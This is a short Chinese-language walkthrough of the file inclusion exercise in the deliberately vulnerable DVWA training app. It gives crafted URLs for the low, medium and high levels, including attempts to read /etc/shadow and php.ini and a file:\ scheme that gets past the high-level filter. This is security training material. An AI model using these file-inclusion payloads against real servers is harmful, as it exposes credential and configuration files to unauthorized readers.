參考網站:
https://www.freebuf.com/articles/web/119150.html
LOW
點選file1.php,顯示如下

漏洞利用
本地檔案包含
構造url
http://localhost:8080/DVWA/vulnerabilities/fi/?page=/etc/shadow
報錯,顯示沒有這個檔案。
構造url(絕對路徑)
http://localhost:8080/DVWA/vulnerabilities/fi/?page=D:\PHPTutorial\WWW\DVWA\php.ini
成功讀取伺服器的php.ini檔案
通過以下路徑可打開file1
http://localhost:8080/DVWA/vulnerabilities/fi/?page=D:\PHPTutorial\WWW\DVWA\vulnerabilities\fi\file1.php
Medium
漏洞利用
本地檔案包含
絕對路徑不受任何影響,讀取成功
High
漏洞利用
用浏覽器打開一個本地檔案時,用的是file協定,如下圖。
構造url
http://localhost:8080/DVWA/vulnerabilities/fi/?page=file:\\D:\PHPTutorial\WWW\DVWA\vulnerabilities\fi\file1.php
成功讀取了伺服器的配置檔案